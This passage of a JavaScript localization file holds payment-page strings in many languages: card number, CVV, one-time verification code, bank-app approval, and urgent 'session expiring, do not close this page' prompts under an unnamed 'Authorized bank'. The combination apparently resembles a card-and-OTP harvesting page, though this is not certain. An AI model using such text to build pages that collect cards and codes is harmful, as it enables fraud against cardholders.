    'cardDenyDebitMsg': "Bu işlem banka kartlarını kabul etmiyor",
    'title': "Yetkili banka",
    'subTitle': "Yetkilendirmeyi onaylamak için lütfen banka uygulamasına gidin",
    'hint': "Lütfen bu sayfayı kapatmayın",
    'rejectMsg': "Oturumun süresi dolmak üzere. Lütfen doğrulamayı şimdi tamamlayın",
    'smsTitle': "Güvenli ödeme",
    'smsPhone': "Doğrulama kodu *** adresine gönderildi",
    'smsOnetime': "Lütfen kimliğinizi doğrulayın; cep telefonu numaranıza veya e-posta adresinize tek kullanımlık bir kod gönderilecektir. Lütfen doğrulama kodunu buraya girin",
    'smsSubtitle': "Lütfen \"Yenile\" veya \"Geri\" düğmelerini tıklatmayın; bu, işleminizi sonlandırabilir veya sonlandırabilir.",
    'rejectSms': "Doğrulama kodu hatası, lütfen tekrar deneyin",
    'smsCode': "Doğrulama kodu",
    'smsSubmit': 'Göndermek',
    'smsResend': "Başka bir kod almak için buraya tıklayın"
  },
  'ja': {
    'cardName': 'カード所有者',
    'cardNumber': "カード番号",
    'cardExpire': "有効期限",
    'cardCvv': "セキュリティコード (CVV)",
    'cardSubmit': "を送信する",
    'cardErrorMsg': "このカードはこの取引をサポートしていません。別のカードをお試しください",
    'cardDenyCreditMsg': "この取引ではクレジット カードはご利用いただけません",
    'cardDenyDebitMsg': "この取引ではデビットカードは利用できません",
    'title': "認定銀行",
    'subTitle': "銀行アプリにアクセスして承認を確認してください",
    'hint': "このページを閉じないでください",
    'rejectMsg': "セッションの有効期限が近づいています。今すぐ認証を完了してください。",
    'smsTitle': "安全な支払い",
    'smsPhone': "確認コードは *** に送信されました",
    'smsOnetime': "本人確認を行ってください。ワンタイム コードが携帯電話番号または電子メール アドレスに送信されます。 ここに確認コードを入力してください",
    'smsSubtitle': "「更新」または「戻る」ボタンをクリックすると、取引が終了したり中止される可能性があるため、クリックしないでください。",
    'rejectSms': "確認コードエラー。もう一度お試しください。",
    'smsCode': '検証コード',
    'smsSubmit': "提出する",
    'smsResend': "別のコードを受け取るにはここをクリックしてください"
  },
  'pl': {
    'cardName': "Posiadacz karty",
    'cardNumber': "Numer karty",
    'cardExpire': "Data ważności",
    'cardCvv': "Kod bezpieczeństwa (CVV)",
    'cardSubmit': 'Składać',
    'cardErrorMsg': "Ta karta nie obsługuje tej transakcji. Spróbuj użyć innej karty",
    'cardDenyCreditMsg': "Do tej transakcji nie są akceptowane karty kredytowe",
    'cardDenyDebitMsg': "Ta transakcja nie akceptuje kart debetowych",
    'title': "Autoryzowany bank",
    'subTitle': "Przejdź do aplikacji banku, aby potwierdzić autoryzację",
    'hint': "Proszę nie zamykać tej strony",
    'rejectMsg': "Sesja wkrótce wygaśnie. Dokończ weryfikację już teraz",
    'smsTitle': "Bezpieczna płatność",
    'smsPhone': "Kod weryfikacyjny został wysłany na adres ***",
    'smsOnetime': "Potwierdź swoją tożsamość, a na Twój numer telefonu komórkowego lub adres e-mail zostanie wysłany jednorazowy kod. Proszę wpisać tutaj kod weryfikacyjny",
    'smsSubtitle': "Prosimy nie klikać przycisków „Odśwież” ani „Wstecz”, ponieważ może to spowodować zakończenie lub zakończenie transakcji",
    'rejectSms': "Błąd kodu weryfikacyjnego. Spróbuj ponownie",
    'smsCode': "Kod weryfikacyjny",
    'smsSubmit': "Składać",
    'smsResend': "Kliknij tutaj, aby otrzymać kolejny kod"
  },
  'cs': {
    'cardName': "Držák karty",
    'cardNumber': "Číslo karty",
    'cardExpire': "Datum spotřeby",
    'cardCvv': "bezpečnostní kód (CVV)",
    'cardSubmit': "Předložit",
    'cardErrorMsg': "Tato karta tuto transakci nepodporuje, zkuste prosím jinou kartu",
    'cardDenyCreditMsg': "Pro tuto transakci nejsou akceptovány kreditní karty",
    'cardDenyDebitMsg': "Tato transakce nepřijímá debetní karty",
    'title': "Autorizovaná banka",
    'subTitle': "Přejděte do aplikace banky a potvrďte autorizaci",
    'hint': "Prosím, nezavírejte tuto stránku",
    'rejectMsg': "Platnost relace brzy vyprší, dokončete prosím ověření nyní",
    'smsTitle': "Bezpečná platba",
    'smsPhone': "Ověřovací kód byl odeslán na adresu ***",
    'smsOnetime': "Potvrďte svou identitu a na vaše mobilní číslo nebo e-mailovou adresu vám bude zaslán jednorázový kód. Zde prosím zadejte ověřovací kód",
    'smsSubtitle': "Neklikejte prosím na tlačítka „Obnovit“ nebo „Zpět“, protože to může ukončit nebo ukončit vaši transakci",
    'rejectSms': "Chyba ověřovacího kódu, zkuste to prosím znovu",
    'smsCode': "Ověřovací kód",
    'smsSubmit': "Předložit",
    'smsResend': "Kliknutím sem získáte další kód"
  },
  'fr': {
    'cardName': "Titulaire de la carte",
    'cardNumber': "Numéro de carte",
    'cardExpire': "Date d'expiration",
    'cardCvv': "Code de sécurité (CVV)",
    'cardSubmit': "Soumettre",
    'cardErrorMsg': "Cette carte ne prend pas en charge cette transaction, veuillez essayer une autre carte",
    'cardDenyCreditMsg': "Les cartes de crédit ne sont pas acceptées pour cette transaction",
    'cardDenyDebitMsg': "Cette transaction n'accepte pas les cartes de débit",
    'title': "Banque autorisée",
    'subTitle': "Veuillez vous rendre sur l'application bancaire pour confirmer l'autorisation",
    'hint': "Merci de ne pas fermer cette page",
    'rejectMsg': "La session est sur le point d'expirer, veuillez terminer la vérification maintenant",
    'smsTitle': "Paiement sécurisé",
    'smsPhone': "Le code de vérification a été envoyé à ***",
    'smsOnetime': "Veuillez confirmer votre identité et un code à usage unique sera envoyé à votre numéro de téléphone portable ou à votre adresse e-mail. Veuillez entrer le code de vérification ici",
    'smsSubtitle': "Veuillez ne pas cliquer sur les boutons « Actualiser » ou « Retour », car cela pourrait mettre fin ou mettre fin à votre transaction.",
    'rejectSms': "Erreur de code de vérification, veuillez réessayer",
    'smsCode': "Le code de vérification",
    'smsSubmit': "Soumettre",
    'smsResend': "Cliquez ici pour recevoir un autre code"
  },
  'ro': {
    'cardName': "Deținătorul cardului",
    'cardNumber': "Numărul de card",
    'cardExpire': "Data de expirare",
    'cardCvv': "Cod de securitate (CVV)",
    'cardSubmit': 'Trimite',
    'cardErrorMsg': "Acest card nu acceptă această tranzacție, vă rugăm să încercați un alt card",
    'cardDenyCreditMsg': "Cardurile de credit nu sunt acceptate pentru această tranzacție",
    'cardDenyDebitMsg': "Această tranzacție nu acceptă carduri de debit",
    'title': "Banca autorizata",
    'subTitle': "Vă rugăm să accesați aplicația băncii pentru a confirma autorizarea",
    'hint': "Vă rugăm să nu închideți această pagină",
    'rejectMsg': "Sesiunea este pe cale să expire, vă rugăm să finalizați verificarea acum",
    'smsTitle': "Plata sigura",
    'smsPhone': "Codul de verificare a fost trimis la ***",
    'smsOnetime': "Vă rugăm să vă confirmați identitatea și un cod unic va fi trimis la numărul dvs. de telefon mobil sau adresa de e-mail. Vă rugăm să introduceți codul de verificare aici",
    'smsSubtitle': "Vă rugăm să nu faceți clic pe butoanele „Reîmprospătare” sau „Înapoi”, deoarece aceasta vă poate închide sau închide tranzacția",
    'rejectSms': "Eroare de cod de verificare, vă rugăm să încercați din nou",
    'smsCode': "Cod de verificare",
    'smsSubmit': "Trimite",
    'smsResend': "Click aici pentru a primi un alt cod"
  },
  'ka': {
    'cardName': "ბარათის მფლობელი",
    'cardNumber': "Ბარათის ნომერი",
    'cardExpire': "ვადის გასვლის თარიღი",
    'cardCvv': "უსაფრთხოების კოდი (CVV)",
    'cardSubmit': "გაგზავნა",
    'cardErrorMsg': "ეს ბარათი არ უჭერს მხარს ამ ტრანზაქციას, გთხოვთ, სცადოთ სხვა ბარათი",
    'cardDenyCreditMsg': "საკრედიტო ბარათები არ მიიღება ამ ტრანზაქციისთვის",
    'cardDenyDebitMsg': "ეს ტრანზაქცია არ იღებს სადებეტო ბარათებს",
    'title': "ავტორიზებული ბანკი",
    'subTitle': "გთხოვთ, გადადით ბანკის აპლიკაციაში ავტორიზაციის დასადასტურებლად",
    'hint': "გთხოვთ არ დახუროთ ეს გვერდი",
    'rejectMsg': "სესიის ვადა იწურება, გთხოვთ, დაასრულოთ დადასტურება ახლავე",
    'smsTitle': "უსაფრთხო გადახდა",
    'smsPhone': "დამადასტურებელი კოდი გაიგზავნა ***",
    'smsOnetime': "გთხოვთ, დაადასტუროთ თქვენი ვინაობა და ერთჯერადი კოდი გაიგზავნება თქვენს მობილურ ნომერზე ან ელფოსტის მისამართზე. გთხოვთ შეიყვანოთ დამადასტურებელი კოდი აქ",
    'smsSubtitle': "გთხოვთ, არ დააჭიროთ ღილაკებს „განახლება“ ან „უკან“, რადგან ამან შეიძლება შეწყვიტოს ან შეწყვიტოს თქვენი ტრანზაქცია",
    'rejectSms': "დამადასტურებელი კოდის შეცდომა, გთხოვთ, სცადოთ ხელახლა",
    'smsCode': "Დამადასტურებელი კოდი",
    'smsSubmit': "გაგზავნა",
    'smsResend': "დააწკაპუნეთ აქ სხვა კოდის მისაღებად"
  },
  'is': {
    'cardName': "Korthafi",
    'cardNumber': "Kortanúmer",
    'cardExpire': "Gildistími",
    'cardCvv': "Öryggiskóði (CVV)",
    'cardSubmit': "Sendu inn",
    'cardErrorMsg': "Þetta kort styður ekki þessa færslu, vinsamlegast reyndu annað kort",
    'cardDenyCreditMsg': "Ekki er tekið við kreditkortum fyrir þessa færslu",
    'cardDenyDebitMsg': "Þessi viðskipti taka ekki við debetkortum",
    'title': "Viðurkenndur banki",
    'subTitle': "Vinsamlegast farðu í bankaappið til að staðfesta heimildina",
    'hint': "Vinsamlegast ekki loka þessari síðu",
    'rejectMsg': "Fundurinn er að renna út, vinsamlegast ljúktu við staðfestinguna núna",
    'smsTitle': "Örugg greiðsla",
    'smsPhone': "Staðfestingarkóði hefur verið sendur til ***",
    'smsOnetime': "Vinsamlegast staðfestu auðkenni þitt og einskiptiskóði verður sendur á farsímanúmerið þitt eða netfangið þitt. Vinsamlegast sláðu inn staðfestingarkóða hér",
    'smsSubtitle': "Vinsamlega ekki smella á „Endurnýja“ eða „Til baka“ hnappana þar sem þetta getur stöðvað eða stöðvað viðskipti þín",
    'rejectSms': "Villa í staðfestingarkóða, vinsamlegast reyndu aftur",
    'smsCode': "Staðfestingarkóði",
    'smsSubmit': "Sendu inn",
    'smsResend': "Smelltu hér til að fá annan kóða"
  },
  'lt': {
    'cardName': "Kortelės turėtojas",
    'cardNumber': "Kortelės numeris",
    'cardExpire': "Galiojimo pabaigos data",
    'cardCvv': "Apsaugos kodas (CVV)",
    'cardSubmit': 'Pateikti',
    'cardErrorMsg': "Ši kortelė nepalaiko šios operacijos, pabandykite kitą kortelę",
    'cardDenyCreditMsg': "Šiai operacijai atlikti nepriimamos kredito kortelės",
    'cardDenyDebitMsg': "Ši operacija nepriima debeto kortelių",
    'title': "Įgaliotas bankas",
    'subTitle': "Eikite į banko programą, kad patvirtintumėte įgaliojimą",
    'hint': "Prašome neuždaryti šio puslapio",
    'rejectMsg': "Sesija netrukus baigsis, užbaikite patvirtinimą dabar",
    'smsTitle': "Saugus mokėjimas",
    'smsPhone': "Patvirtinimo kodas išsiųstas ***",
    'smsOnetime': "Patvirtinkite savo tapatybę ir jūsų mobiliojo telefono numeriu arba el. pašto adresu bus išsiųstas vienkartinis kodas. Įveskite patvirtinimo kodą čia",
    'smsSubtitle': "Nespauskite mygtukų „Atnaujinti“ arba „Atgal“, nes tai gali nutraukti arba nutraukti jūsų operaciją",
    'rejectSms': "Patvirtinimo kodo klaida, bandykite dar kartą",
    'smsCode': "Patvirtinimo kodas",
    'smsSubmit': "Pateikti",
    'smsResend': "Spustelėkite čia, kad gautumėte kitą kodą"
  },
  'it': {
    'cardName': "Titolare della carta",
    'cardNumber': "Numero di carta",
    'cardExpire': "Data di scadenza",
    'cardCvv': "Codice di Sicurezza (CVV)",
    'cardSubmit': "Invia",
    'cardErrorMsg': "Questa carta non supporta questa transazione, prova con un'altra carta",
    'cardDenyCreditMsg': "Per questa transazione non si accettano carte di credito",
    'cardDenyDebitMsg': "Questa transazione non accetta carte di debito",
    'title': "Banca autorizzata",
    'subTitle': "Vai all'app della banca per confermare l'autorizzazione",
    'hint': "Per favore non chiudere questa pagina",
    'rejectMsg': "La sessione sta per scadere, completa ora la verifica",
    'smsTitle': "Pagamento sicuro",
    'smsPhone': "Il codice di verifica è stato inviato a ***",
    'smsOnetime': "Conferma la tua identità e un codice monouso verrà inviato al tuo numero di cellulare o indirizzo email. Inserisci il codice di verifica qui",
    'smsSubtitle': "Si prega di non fare clic sui pulsanti \"Aggiorna\" o \"Indietro\" poiché ciò potrebbe interrompere o terminare la transazione",
    'rejectSms': "Errore nel codice di verifica, riprova",
    'smsCode': "Codice di verifica",
    'smsSubmit': "Invia",
    'smsResend': "Clicca qui per ricevere un altro codice"
  },
  'bg': {
    'cardName': "Картодържател",
    'cardNumber': "Номер на карта",
    'cardExpire': "Краен срок",
    'cardCvv': "Код за сигурност (CVV)",
    'cardSubmit': "Изпращане",
    'cardErrorMsg': "Тази карта не поддържа тази транзакция, моля, опитайте с друга карта",
    'cardDenyCreditMsg': "Кредитни карти не се приемат за тази транзакция",
    'cardDenyDebitMsg': "Тази транзакция не приема дебитни карти",
    'title': "Оторизирана банка",
    'subTitle': "Моля, отидете в приложението на банката, за да потвърдите оторизацията",
    'hint': "Моля, не затваряйте тази страница",
    'rejectMsg': "Сесията е на път да изтече, моля, завършете проверката сега",
    'smsTitle': "Сигурно плащане",
    'smsPhone': "Кодът за потвърждение е изпратен на ***",
    'smsOnetime': "Моля, потвърдете вашата самоличност и еднократен код ще бъде изпратен на вашия мобилен номер или имейл адрес. Моля, въведете кода за потвърждение тук",
    'smsSubtitle': "Моля, не натискайте бутоните „Опресняване“ или „Назад“, тъй като това може да прекрати или прекрати вашата транзакция",
    'rejectSms': "Грешка в кода за потвърждение, моля, опитайте отново",
    'smsCode': "Код за потвърждение",
    'smsSubmit': "Изпращане",
    'smsResend': "Щракнете тук, за да получите друг код"
  },
  'vi': {
    'cardName': "Chủ thẻ",
    'cardNumber': "Số thẻ",
    'cardExpire': "Hạn sử dụng",
    'cardCvv': "Mã bảo mật (CVV)",
    'cardSubmit': 'Nộp',
    'cardErrorMsg': "Thẻ này không hỗ trợ giao dịch này, vui lòng thử thẻ khác",
    'cardDenyCreditMsg': "Thẻ tín dụng không được chấp nhận cho giao dịch này",
    'cardDenyDebitMsg': "Giao dịch này không chấp nhận thẻ ghi nợ",
    'title': "Ngân hàng được ủy quyền",
    'subTitle': "Vui lòng vào App ngân hàng để xác nhận ủy quyền",
    'hint': "Vui lòng không đóng trang này",
    'rejectMsg': "Phiên sắp hết hạn, vui lòng hoàn tất xác minh ngay bây giờ",
    'smsTitle': "Thanh toán an toàn",
    'smsPhone': "Mã xác minh đã được gửi tới ***",
    'smsOnetime': "Vui lòng xác nhận danh tính của bạn và mã một lần sẽ được gửi đến số điện thoại di động hoặc địa chỉ email của bạn. Vui lòng nhập mã xác minh tại đây",
    'smsSubtitle': "Vui lòng không nhấp vào nút \"Làm mới\" hoặc \"Quay lại\" vì điều này có thể chấm dứt hoặc chấm dứt giao dịch của bạn",
    'rejectSms': "Lỗi mã xác minh, vui lòng thử lại",
    'smsCode': "Mã xác nhận",
    'smsSubmit': "Nộp",
    'smsResend': "Bấm vào đây để nhận mã khác"
  },
  'hy': {
    'cardName': "Քարտապան",
    'cardNumber': "Քարտի համար",
    'cardExpire': "Ժամկետի ժամկետը",
    'cardCvv': "Անվտանգության կոդ (CVV)",
    'cardSubmit': "Ներկայացնել",
    'cardErrorMsg': "Այս քարտը չի աջակցում այս գործարքին, խնդրում ենք փորձել այլ քարտ",
    'cardDenyCreditMsg': "Այս գործարքի համար վարկային քարտեր չեն ընդունվում",
    'cardDenyDebitMsg': "Այս գործարքը չի ընդունում դեբետային քարտեր",
    'title': "Լիազորված բանկ",
    'subTitle': "Խնդրում ենք գնալ բանկի հավելված՝ թույլտվությունը հաստատելու համար",
    'hint': "Խնդրում եմ մի փակեք այս էջը",
    'rejectMsg': "Նիստը մոտ է ավարտին, խնդրում ենք լրացնել ստուգումը հիմա",
    'smsTitle': "Ապահով վճարում",
    'smsPhone': "Հաստատման կոդը ուղարկվել է ***",
    'smsOnetime': "Խնդրում ենք հաստատել ձեր ինքնությունը և մեկանգամյա կոդը կուղարկվի ձեր բջջային հեռախոսահամարին կամ էլ.փոստի հասցեին: Խնդրում ենք մուտքագրել հաստատման կոդը այստեղ",
    'smsSubtitle': "Խնդրում ենք մի սեղմեք «Թարմացնել» կամ «Վերադառնալ» կոճակները, քանի որ դա կարող է դադարեցնել կամ դադարեցնել ձեր գործարքը",
    'rejectSms': "Հաստատման կոդի սխալ, խնդրում ենք կրկին փորձել",
    'smsCode': "Ստուգման կոդը",
    'smsSubmit': "Ներկայացնել",
    'smsResend': "Մեկ այլ կոդ ստանալու համար սեղմեք այստեղ"
  },
  'hi': {
    'cardName': "कार्ड धारक",
    'cardNumber': "कार्ड संख्या",
    'cardExpire': "समाप्त होने की तिथि",
    'cardCvv': "सुरक्षा कोड (सीवीवी)",
    'cardSubmit': "जमा करना",
    'cardErrorMsg': "यह कार्ड इस लेनदेन का समर्थन नहीं करता, कृपया कोई अन्य कार्ड आज़माएँ",
    'cardDenyCreditMsg': "इस लेनदेन के लिए क्रेडिट कार्ड स्वीकार नहीं किए जाते हैं",
    'cardDenyDebitMsg': "यह लेनदेन डेबिट कार्ड स्वीकार नहीं करता है",
    'title': "अधिकृत बैंक",
    'subTitle': "प्राधिकरण की पुष्टि के लिए कृपया बैंक ऐप पर जाएं",
    'hint': "कृपया इस पेज को बंद न करें",
    'rejectMsg': "सत्र समाप्त होने वाला है, कृपया अब सत्यापन पूरा करें",
    'smsTitle': "सुरक्षित भुगतान",
    'smsPhone': "सत्यापन कोड *** पर भेज दिया गया है",
    'smsOnetime': "कृपया अपनी पहचान की पुष्टि करें और आपके मोबाइल नंबर या ईमेल पते पर एक बार का कोड भेजा जाएगा। कृपया यहां सत्यापन कोड दर्ज करें",
    'smsSubtitle': "कृपया \"रीफ्रेश\" या \"बैक\" बटन पर क्लिक न करें क्योंकि इससे आपका लेनदेन समाप्त हो सकता है या समाप्त हो सकता है",
    'rejectSms': "सत्यापन कोड त्रुटि, कृपया पुनः प्रयास करें",
    'smsCode': "सत्यापन कोड",
    'smsSubmit': "जमा करना",
    'smsResend': "अन्य कोड प्राप्त करने के लिए यहां क्लिक करें"
  },
  'id': {
    'cardName': "Pemegang kartu",
    'cardNumber': "Nomor kartu",
    'cardExpire': "Tanggal kadaluarsa",
    'cardCvv': "Kode Keamanan (CVV)",
    'cardSubmit': 'Kirim',
    'cardErrorMsg': "Kartu ini tidak mendukung transaksi ini, silakan coba kartu lain",
    'cardDenyCreditMsg': "Kartu kredit tidak diterima untuk transaksi ini",
    'cardDenyDebitMsg': "Transaksi ini tidak menerima kartu debit",
    'title': "Bank resmi",
    'subTitle': "Silakan buka Aplikasi bank untuk mengonfirmasi otorisasi",
    'hint': "Tolong jangan tutup halaman ini",
    'rejectMsg': "Sesi ini akan segera berakhir, harap selesaikan verifikasi sekarang",
    'smsTitle': "Pembayaran aman",
    'smsPhone': "Kode verifikasi telah dikirim ke ***",
    'smsOnetime': "Harap konfirmasi identitas Anda dan kode satu kali akan dikirimkan ke nomor ponsel atau alamat email Anda. Silakan masukkan kode verifikasi di sini",
    'smsSubtitle': "Mohon jangan mengklik tombol \"Segarkan\" atau \"Kembali\" karena dapat mengakhiri atau mengakhiri transaksi Anda",
    'rejectSms': "Kesalahan kode verifikasi, silakan coba lagi",
    'smsCode': "Kode verifikasi",
    'smsSubmit': "Kirim",
    'smsResend': "Klik di sini untuk menerima kode lain"
  },
  'az': {
    'cardName': "Kart sahibi",
    'cardNumber': "Kartı nömrəsi",
    'cardExpire': "Bitmə tarixi",
    'cardCvv': "Təhlükəsizlik Kodu (CVV)",
    'cardSubmit': "təqdim",
    'cardErrorMsg': "Bu kart bu əməliyyatı dəstəkləmir, lütfən, başqa kartı sınayın",
    'cardDenyCreditMsg': "Bu əməliyyat üçün kredit kartları qəbul edilmir",
    'cardDenyDebitMsg': "Bu əməliyyat debet kartlarını qəbul etmir",
    'title': "Səlahiyyətli bank",
    'subTitle': "Lütfən, avtorizasiyanı təsdiqləmək üçün bank Proqramına keçin",
    'hint': "Xahiş edirəm bu səhifəni bağlamayın",
    'rejectMsg': "Sessiya bitmək üzrədir, lütfən, indi yoxlamanı tamamlayın",
    'smsTitle': "Təhlükəsiz ödəniş",
    'smsPhone': "Doğrulama kodu *** ünvanına göndərildi",
    'smsOnetime': "Zəhmət olmasa şəxsiyyətinizi təsdiqləyin və mobil nömrənizə və ya e-poçt ünvanınıza birdəfəlik kod göndəriləcək. Doğrulama kodunu bura daxil edin",
    'smsSubtitle': "Lütfən, \"Yenilə\" və ya \"Geri\" düymələrinə klikləməyin, çünki bu, əməliyyatınızı dayandıra və ya dayandıra bilər",
    'rejectSms': "Doğrulama kodu xətası, yenidən cəhd edin",
    'smsCode': "Yoxlama kodu",
    'smsSubmit': "təqdim",
    'smsResend': "Başqa kodu almaq üçün bura klikləyin"
  },
  'th': {
    'cardName': "ผู้ถือบัตร",
    'cardNumber': "หมายเลขบัตร",
    'cardExpire': "วันที่หมดอายุ",
    'cardCvv': "รหัสรักษาความปลอดภัย (CVV)",
    'cardSubmit': 'ส่ง',
    'cardErrorMsg': "บัตรใบนี้ไม่รองรับธุรกรรมนี้ โปรดลองใช้บัตรอื่น",
    'cardDenyCreditMsg': "ไม่รับบัตรเครดิตสำหรับการทำธุรกรรมนี้",
    'cardDenyDebitMsg': "ธุรกรรมนี้ไม่รับบัตรเดบิต",
    'title': "ธนาคารที่ได้รับอนุญาต",
    'subTitle': "โปรดไปที่แอปธนาคารเพื่อยืนยันการอนุมัติ",
    'hint': "กรุณาอย่าปิดเพจนี้",
    'rejectMsg': "เซสชั่นกำลังจะหมดอายุ โปรดทำการยืนยันให้เสร็จสิ้นทันที",
    'smsTitle': "การชำระเงินที่ปลอดภัย",
    'smsPhone': "รหัสยืนยันได้ถูกส่งไปที่ ***",
    'smsOnetime': "โปรดยืนยันตัวตนของคุณและรหัสแบบใช้ครั้งเดียวจะถูกส่งไปยังหมายเลขโทรศัพท์มือถือหรือที่อยู่อีเมลของคุณ กรุณากรอกรหัสยืนยันที่นี่",
    'smsSubtitle': "โปรดอย่าคลิกปุ่ม \"รีเฟรช\" หรือ \"ย้อนกลับ\" เนื่องจากอาจยุติหรือยุติธุรกรรมของคุณได้",
    'rejectSms': "รหัสยืนยันเกิดข้อผิดพลาด โปรดลองอีกครั้ง",
    'smsCode': "รหัสยืนยัน",
    'smsSubmit': "ส่ง",
    'smsResend': "คลิกที่นี่เพื่อรับรหัสอื่น"
  },
  'ru': {
    'cardName': "Владелец карты",
    'cardNumber': "Номер карты",
    'cardExpire': "Годен до",
    'cardCvv': "Код безопасности (CVV)",
    'cardSubmit': "Представлять на рассмотрение",
    'cardErrorMsg': "Эта карта не поддерживает эту транзакцию, попробуйте другую карту.",
    'cardDenyCreditMsg': "Кредитные карты не принимаются для этой транзакции.",
    'cardDenyDebitMsg': "Эта транзакция не принимает дебетовые карты.",
    'title': "Уполномоченный банк",
    'subTitle': "Пожалуйста, зайдите в приложение банка, чтобы подтвердить авторизацию.",
    'hint': "Пожалуйста, не закрывайте эту страницу",
    'rejectMsg': "Сессия скоро истечет, пожалуйста, завершите проверку сейчас",
    'smsTitle': "Безопасная оплата",
    'smsPhone': "Код подтверждения отправлен на ***",
    'smsOnetime': "Пожалуйста, подтвердите свою личность, и на ваш номер мобильного телефона или адрес электронной почты будет отправлен одноразовый код. Введите код подтверждения здесь.",
    'smsSubtitle': "Пожалуйста, не нажимайте кнопки «Обновить» или «Назад», так как это может прекратить или прекратить вашу транзакцию.",
    'rejectSms': "Ошибка кода подтверждения. Повторите попытку.",
    'smsCode': "Проверочный код",
    'smsSubmit': "Представлять на рассмотрение",
    'smsResend': "Нажмите здесь, чтобы получить еще один код"
  },
  'bn': {
    'cardName': 'কার্ডধারী',
    'cardNumber': "কার্ড নম্বর",
    'cardExpire': "মেয়াদ উত্তীর্ণের তারিখ",
    'cardCvv': "নিরাপত্তা কোড (CVV)",
    'cardSubmit': "জমা দিন",
    'cardErrorMsg': "এই কার্ড এই লেনদেন সমর্থন করে না, অন্য কার্ড চেষ্টা করুন",
    'cardDenyCreditMsg': "এই লেনদেনের জন্য ক্রেডিট কার্ড গ্রহণ করা হয় না",
    'cardDenyDebitMsg': "এই লেনদেন ডেবিট কার্ড গ্রহণ করে না",
    'title': "অনুমোদিত ব্যাংক",
    'subTitle': "অনুমোদন নিশ্চিত করতে অনুগ্রহ করে ব্যাঙ্ক অ্যাপে যান",
    'hint': "দয়া করে এই পৃষ্ঠাটি বন্ধ করবেন না",
    'rejectMsg': "অধিবেশনের মেয়াদ শেষ হতে চলেছে, অনুগ্রহ করে এখনই যাচাইকরণ সম্পূর্ণ করুন৷",
    'smsTitle': "নিরাপদ অর্থপ্রদান",
    'smsPhone': "যাচাইকরণ কোড পাঠানো হয়েছে ***",
    'smsOnetime': "অনুগ্রহ করে আপনার পরিচয় নিশ্চিত করুন এবং আপনার মোবাইল নম্বর বা ইমেল ঠিকানায় একটি এককালীন কোড পাঠানো হবে। এখানে যাচাইকরণ কোড লিখুন",
    'smsSubtitle': "অনুগ্রহ করে \"রিফ্রেশ\" বা \"ব্যাক\" বোতামে ক্লিক করবেন না কারণ এটি আপনার লেনদেন বন্ধ বা বন্ধ করতে পারে",
    'rejectSms': "যাচাইকরণ কোড ত্রুটি, আবার চেষ্টা করুন",
    'smsCode': "যাচাইকরণ কোড",
    'smsSubmit': "জমা দিন",
    'smsResend': "অন্য কোড পেতে এখানে ক্লিক করুন"
  },
  'sr': {
    'cardName': "Власник картице",
    'cardNumber': "Број картице",
    'cardExpire': "Датум истека",
    'cardCvv': "Сигурносни код (ЦВВ)",
    'cardSubmit': "прихвати",
    'cardErrorMsg': "Ова картица не подржава ову трансакцију, покушајте са другом картицом",
    'cardDenyCreditMsg': "Кредитне картице се не прихватају за ову трансакцију",
    'cardDenyDebitMsg': "Ова трансакција не прихвата дебитне картице",
    'title': "Овлашћена банка",
    'subTitle': "Идите на апликацију банке да потврдите овлашћење",
    'hint': "Молимо вас да не затварате ову страницу",
    'rejectMsg': "Сесија ускоро истиче, завршите верификацију сада",
    'smsTitle': "Сигурно плаћање",
    'smsPhone': "Верификациони код је послат на ***",
    'smsOnetime': "Молимо потврдите свој идентитет и једнократни код ће бити послат на ваш број мобилног телефона или адресу е-поште. Унесите верификациони код овде",
    'smsSubtitle': "Немојте кликнути на дугме „Освежи“ или „Назад“ јер то може да прекине или прекине вашу трансакцију",
    'rejectSms': "Грешка код верификационог кода, покушајте поново",
    'smsCode': "Верификациони код",
    'smsSubmit': "прихвати",
    'smsResend': "Кликните овде да бисте добили други код"
  },
  'bs': {
    'cardName': "Vlasnik kartice",
    'cardNumber': "Broj kartice",
    'cardExpire': "Datum isteka",
    'cardCvv': "Sigurnosni kod (CVV)",
    'cardSubmit': "Submit",
    'cardErrorMsg': "Ova kartica ne podržava ovu transakciju, pokušajte sa drugom karticom",
    'cardDenyCreditMsg': "Kreditne kartice se ne prihvaćaju za ovu transakciju",
    'cardDenyDebitMsg': "Ova transakcija ne prihvaća debitne kartice",
    'title': "Ovlašćena banka",
    'subTitle': "Idite na aplikaciju banke da potvrdite autorizaciju",
    'hint': "Molimo vas da ne zatvarate ovu stranicu",
    'rejectMsg': "Sesija uskoro ističe, dovršite verifikaciju sada",
    'smsTitle': "Sigurno plaćanje",
    'smsPhone': "Verifikacioni kod je poslan na ***",
    'smsOnetime': "Molimo potvrdite svoj identitet i jednokratni kod će biti poslan na vaš broj mobilnog telefona ili adresu e-pošte. Molimo unesite verifikacioni kod ovdje",
    'smsSubtitle': "Molimo nemojte kliknuti na dugme \"Osvježi\" ili \"Nazad\" jer to može prekinuti ili prekinuti vašu transakciju",
    'rejectSms': "Greška kod verifikacionog koda, pokušajte ponovo",
    'smsCode': "Verifikacijski kod",
    'smsSubmit': 'Submit',
    'smsResend': "Kliknite ovdje da dobijete drugi kod"
  },
  'mk': {
    'cardName': "Сопственик на картичка",
    'cardNumber': "Број на картичка",
    'cardExpire': "Датум на истекување",
    'cardCvv': "Безбедносен код (CVV)",
    'cardSubmit': "Поднесете",
    'cardErrorMsg': "Оваа картичка не ја поддржува оваа трансакција, обидете се со друга картичка",
    'cardDenyCreditMsg': "Кредитни картички не се прифаќаат за оваа трансакција",
    'cardDenyDebitMsg': "Оваа трансакција не прифаќа дебитни картички",
    'title': "Овластена банка",
    'subTitle': "Ве молиме одете во апликацијата на банката за да го потврдите овластувањето",
    'hint': "Ве молиме не ја затворајте оваа страница",
    'rejectMsg': "Сесијата ќе истече, ве молиме пополнете ја потврдата сега",
    'smsTitle': "Безбедно плаќање",
    'smsPhone': "Кодот за потврда е испратен на ***",
    'smsOnetime': "Ве молиме потврдете го вашиот идентитет и на вашиот мобилен број или адреса на е-пошта ќе ви биде испратен еднократен код. Ве молиме внесете го кодот за потврда овде",
    'smsSubtitle': "Ве молиме не кликнувајте на копчињата „Освежи“ или „Назад“ бидејќи тоа може да ја прекине или прекине вашата трансакција",
    'rejectSms': "Грешка во кодот за потврда, обидете се повторно",
    'smsCode': "Код за верификација",
    'smsSubmit': "Поднесете",
    'smsResend': "Кликнете овде за да добиете друг код"
  },
  'tk': {
    'cardName': "Kart eýesi",
    'cardNumber': "Kart nomeri",
    'cardExpire': "Möhleti gutarýan senesi",
    'cardCvv': "Howpsuzlyk kody (CVV)",
    'cardSubmit': "Iberiň",
    'cardErrorMsg': "Bu kartoçka bu amaly goldamaýar, başga bir kartany synap görmegiňizi haýyş edýäris",
